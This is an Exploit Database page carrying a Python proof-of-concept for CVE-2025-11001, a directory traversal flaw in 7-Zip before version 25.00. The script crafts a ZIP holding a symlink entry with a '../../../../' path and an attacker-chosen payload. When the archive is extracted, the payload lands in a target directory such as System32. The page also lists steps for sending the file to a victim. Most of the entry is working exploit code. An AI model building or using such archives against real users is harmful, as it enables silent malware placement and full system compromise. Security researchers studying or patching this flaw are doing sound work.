[local] 7-Zip 24.00 - Directory Traversal

EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING 7-Zip 24.00 - Directory Traversal EDB-ID: 52501 CVE: 2025-11001 EDB Verified: Author: MOHAMMED IDREES BANYAMER Type: LOCAL Exploit:   /   Platform: MULTIPLE Date: 2026-04-08 Vulnerable App: # Exploit Title: 7-Zip < 25.00 - Directory Traversal to RCE via Malicious ZIP # Date: 2025-11-22 # Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # GitHub: https://github.com/mbanyamer # Vendor Homepage: https://www.7-zip.org # Software Link: https://www.7-zip.org/download.html # Version: 7-Zip < 25.00 # Tested on: Windows 10 / Windows 11 (7-Zip 24.xx) # CVE: CVE-2025-11001 # CVSS: 8.8 (High) - draft estimation # Category: Local Privilege Escalation / Remote Code Execution # Platform: Windows # CRITICAL: Yes - Public exploit available, active exploitation reported # Including: Directory Traversal via crafted symlink entry in ZIP archive # Impact: Full system compromise when extracting malicious archive with 7-Zip as Administrator # Fix: Upgrade to 7-Zip 25.00 or later # Advisory: https://www.7-zip.org/history.txt # Patch: https://github.com/ip7z/7zip/releases/tag/25.00 # Target: Windows systems running vulnerable 7-Zip versions import struct import os import argparse import sys def build_zip(target_path, payload_file, output_zip): if not os.path.isfile(payload_file): print(f"[-] Payload file not found: {payload_file}") sys.exit(1) payload_name = os.path.basename(payload_file) payload_data = open(payload_file, "rb").read() target = target_path.replace("\\", "/").strip("/") + "/" traversal = "../../../../" + target with open(output_zip, "wb") as f: offset = 0 symlink_name = "evil.lnk" symlink_target = traversal.encode() + b"\x00" symlink_extra = struct.pack("<HH", 0x756e, len(symlink_target)) + symlink_target symlink_header = struct.pack("<IHHHHHHIIIHH", 0x04034b50, 20, 0x800, 0x800, 0, 0, 0, 0, 0, 0, len(symlink_name), len(symlink_extra)) f.write(symlink_header) f.write(symlink_name.encode()) f.write(symlink_extra) f.write(b"") symlink_central_offset = offset offset += len(symlink_header) + len(symlink_name) + len(symlink_extra) payload_header = struct.pack("<IHHHHHHIIIHH", 0x04034b50, 20, 0x800, 0, 0, 0, 0, len(payload_data), len(payload_data), len(payload_name), 0) f.write(payload_header) f.write(payload_name.encode()) f.write(payload_data) payload_central_offset = offset offset += len(payload_header) + len(payload_name) + len(payload_data) cd_offset = offset f.write(struct.pack("<IHHHHHHIIIHHHHHII", 0x02014b50, 0x0317, 20, 0x800, 0, 0, 0, 0, 0, 0, len(symlink_name), len(symlink_extra), 0, 0, 0, 0o777 << 16 | 0xA1ED, symlink_central_offset)) f.write(symlink_name.encode()) f.write(symlink_extra) f.write(struct.pack("<IHHHHHHIIIHHHHHII", 0x02014b50, 0x0317, 20, 0x800, 0, 0, 0, 0, len(payload_data), len(payload_data), len(payload_name), 0, 0, 0, 0, 0o777 << 16, payload_central_offset)) f.write(payload_name.encode()) f.write(struct.pack("<IHHHHIIH", 0x06054b50, 0, 0, 2, 2, offset, cd_offset, 0)) print(f"[+] Malicious archive created: {output_zip}") print(f"[+] Target path : {target_path}") print(f"[+] Payload file : {payload_name} ({len(payload_data)} bytes)") print(f"[+] Final write location : {target_path}\\{payload_name}") print("\n[*] Usage:") print(" 1. Send the ZIP file to the victim") print(" 2. Victim must run 7-Zip < 25.00 as Administrator") print(" 3. Victim opens and extracts the ZIP → payload dropped silently") print(" 4. Achievement unlocked") if __name__ == "__main__": banner = """ CVE-2025-11001 - 7-Zip Directory Traversal PoC Author: Mohammed Idrees Banyamer (@banyamer_security) """ print(banner) parser = argparse.ArgumentParser(description="CVE-2025-11001 Exploit - 7-Zip < 25.00") parser.add_argument("-t", "--target", required=True, help="Target directory (e.g. C:\\Windows\\System32)") parser.add_argument("-p", "--payload", required=True, help="Payload file to drop (e.g. C:\\Windows\\System32\\calc.exe)") parser.add_argument("-o", "--output", default="CVE-2025-11001-exploit.zip", help="Output ZIP filename (default: CVE-2025-11001-exploit.zip)") args = parser.parse_args() build_zip(args.target, args.payload, args.output) Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services